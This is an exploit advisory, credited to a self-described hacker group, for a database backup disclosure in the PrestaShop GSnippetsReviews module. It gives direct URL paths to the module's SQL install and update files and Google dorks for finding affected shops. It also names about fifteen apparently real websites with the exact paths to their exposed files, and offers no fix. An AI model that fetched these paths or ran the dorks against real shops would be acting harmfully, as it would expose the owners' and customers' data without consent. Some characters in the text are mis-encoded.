PrestaShop Google GSnippetsReviews modules version 1.6.1.4 suffers from a database disclosure vulnerability.
adcf3a70015372a8abe1b2db0c8a21f0####################################################################
# Exploit Title : PrestaShop Google GSnippetsReviews Modules 1.6.1.4
Database Backup Disclosure
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security
Army
# Date : 24/12/2018
# Vendor Homepage : prestashop.com
# Software Download Link :
addons.prestashop.com/en/seo-natural-search-engine-optimization/
6144-customer-ratings-and-reviews-pro-google-rich-snippets.html
+ sourceforge.net/projects/prestashopratingreview/
+
codecanyon.net/item/prestashop-products-review-google-rich-snippets-module/20545945
+
storeprestamodules.com/prestashop-modules-google-snippets-product-reviews.html
# Software Price : 100 Euro
# Tested On : Windows and Linux
# Category : WebApps
# Version Information : 1.4.11.0A+- - 1.4.7.0 - 1.4.6.2 - 1.5.4.0 -
1.5.6.1- 1.5.6.2 - 1.5.3.1 - 1.6.0.12A+- - 1.6.1.1A+- - 1.6.1.4A+-
# Exploit Risk : Medium
# Google Dorks : inurl:''/modules/gsnippetsreviews/sql/''
intext:''A(c) 2013 - Vinta Quatre. Tous droits rA(c)servA(c)s - CrA(c)ation Yellow
Agence Internet''
intext:''A(c) 2018 - DECO LED VLC''
intext:''Powered by e-com''
intext:''A(c) 2018 Sud Corner tous droits rA(c)servA(c)s''
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access
Controls ]
CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
####################################################################
# Exploit :
/modules/gsnippetsreviews/sql/install.sql
/modules/gsnippetsreviews/sql/uninstall.sql
/modules/gsnippetsreviews/sql/update-date-rating.sql
/modules/gsnippetsreviews/sql/update-lang-review.sql
/modules/gsnippetsreviews/sql/update-voucher-fb.sql
###################################################################
# Example Vulnerable Sites =>
[+] vinta-quatre.com/modules/gsnippetsreviews/sql/uninstall.sql
[+] himmelslaternen.ch/modules/gsnippetsreviews/sql/install.sql
[+] decoledvalencia.com/modules/gsnippetsreviews/sql/install.sql
[+] cactose-boutique.fr/modules/gsnippetsreviews/sql/install.sql
[+] kakicrazy.fr/modules/gsnippetsreviews/sql/install.sql
[+]
originalveniceshop.com/modules/gsnippetsreviews/sql/update-date-rating.sql
[+] sudcorner.com/modules/gsnippetsreviews/sql/update-lang-review.sql
[+] cobureau.net/modules/gsnippetsreviews/sql/update-voucher-fb.sql
[+] mondo-bougies.com/modules/gsnippetsreviews/sql/update-date-rating.sql
[+] rygeshop.dk/modules/gsnippetsreviews/sql/update-voucher-fb.sql
[+] nsbconcept.com/modules/gsnippetsreviews/sql/update-date-rating.sql
[+] ventiladorestecho.net/modules/gsnippetsreviews/sql/uninstall.sql
[+] mediaperfect.fr/shop/modules/gsnippetsreviews/sql/install.sql
[+] tu-instrumento.com.ar/modules/gsnippetsreviews/sql/update-voucher-fb.sql
[+]
multicouche-et-accessoires.fr/modules/gsnippetsreviews/sql/update-date-rating.sql
####################################################################
# Discovered By Hacker KingSkrupellos from Cyberizm.Org Digital Security
Team
####################################################################